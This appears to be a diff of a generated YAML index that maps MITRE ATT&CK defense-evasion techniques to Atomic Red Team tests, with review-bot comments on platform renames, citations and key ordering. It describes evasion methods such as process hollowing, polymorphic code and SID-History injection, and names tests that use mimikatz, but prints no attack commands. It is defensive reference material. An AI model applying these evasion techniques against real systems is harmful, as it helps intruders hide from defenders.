Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -18810,11 +18899,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -18831,7 +18919,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -18841,7 +18928,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -18850,19 +18937,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
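Review bot: the platform list for Valid Accounts replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (version '2.6' to '2.7'), and Multi-Factor Authentication and Web Session Cookie receive the same treatment further down. Anything that builds per-platform indexes by matching the old platform strings will silently produce empty or stale output for those platforms, so the platform-to-index mapping should be updated in the same change, and tests previously listed under Azure AD / Office 365 / Google Workspace should be checked to confirm they still land in an index.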
@@ -18910,11 +18995,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -18982,18 +19068,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests:
- name: Process Hollowing using PowerShell
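Review bot: the 'Leitch Hollowing' reference swaps the original URL (http://www.autosectools.com/process-hollowing.pdf) for a copy hosted at new.dc414.org, with the retrieval date moved to September 12, 2024. If this mirrors the upstream ATT&CK change it is fine, but a third-party mirror of a PDF is a weaker citation than the publisher's own host; consider noting in the commit message that upstream made the swap so the provenance is clear.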
@@ -19163,7 +19248,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -19185,7 +19270,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -19260,6 +19344,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -19319,7 +19404,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests:
- name: Execute base64-encoded PowerShell
@@ -19572,7 +19656,7 @@ defense-evasion:
name: command_prompt
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -19601,24 +19685,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
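Review bot: `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are inserted earlier in the object here (after `phase_name: persistence` and after `x_mitre_is_subtechnique: true`) and deleted from their old position in the next hunk, which turns a no-op move into several lines of churn. If the generator serialises keys in upstream order that is expected; otherwise emitting keys in a fixed order would keep future diffs reviewable. Separately, `x_mitre_detection: ''` remains empty for T1556.006, so this entry still gives a detection engineer nothing to work from.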
@@ -19653,9 +19739,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -19678,7 +19761,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -19696,8 +19779,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
@@ -19736,7 +19817,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -19779,8 +19860,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests:
- name: Register Portable Virtualbox
@@ -19944,6 +20023,76 @@ defense-evasion:
cleanup_command: |-
Stop-VM $VM -Force
Remove-VM $VM -Force
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
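Review bot: the new Polymorphic Code entry (T1027.014) lands with `x_mitre_detection: ''` and `atomic_tests: []`, and its double-quoted description scalar carries a stray space before `\nOther` and a trailing `\n`; if the text is copied verbatim from upstream leave it, otherwise normalise it to the `|-` block style used by the neighbouring entries. It is also inserted after the T1564.006 atomic tests rather than beside the other T1027.* entries, which matches this file's unordered layout but makes the addition hard to spot by eye.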
@@ -19987,7 +20136,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -20012,8 +20161,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests:
- name: Injection SID-History with mimikatz
@@ -20092,7 +20239,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -20111,7 +20258,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -20206,11 +20352,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -20290,11 +20435,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -20359,7 +20503,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
@@ -20535,7 +20678,7 @@ defense-evasion:
name: command_prompt
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -20584,8 +20727,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -20600,9 +20743,8 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests:
- name: Masquerading as Windows LSASS process
@@ -20765,7 +20907,7 @@ defense-evasion:
elevation_required: true
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -20777,7 +20919,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -20807,13 +20949,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -20874,7 +21015,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests:
- name: Execution of program.exe as service with unquoted service path
@@ -20958,11 +21098,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -20986,11 +21125,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -21015,9 +21153,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -21097,7 +21234,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -21131,7 +21267,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -21158,8 +21294,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests:
- name: Regasm Uninstall Method Call Test
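Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed for T1218.009 with no replacement visible in this hunk, whereas T1027.004 further down gets `x_mitre_attack_spec_version: 3.2.0` re-added in its rewritten block; confirm T1218.009 still carries a spec version after this change, otherwise consumers that key on that field will see it missing for this one object.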
@@ -21333,7 +21467,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests:
- name: Install root CA on Windows
@@ -21426,43 +21559,20 @@ defense-evasion:
elevation_required: true
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
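Review bot: the only substantive changes in this hunk are the new `ilasm.exe(Citation: ATTACK IQ)` sentence in the description and the added contributor `Liran Ravich, CardinalOps`; the rest is key reordering and should not be read as a content change. Note that `x_mitre_detection` still names only csc.exe and GCC/MinGW, so the detection guidance now lags the description; that text is upstream ATT&CK content (as is the missing space before `(Citation: ATTACK IQ)`), so it belongs in an upstream fix rather than a hand edit to this generated file.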
@@ -21471,9 +21581,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -21485,12 +21600,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
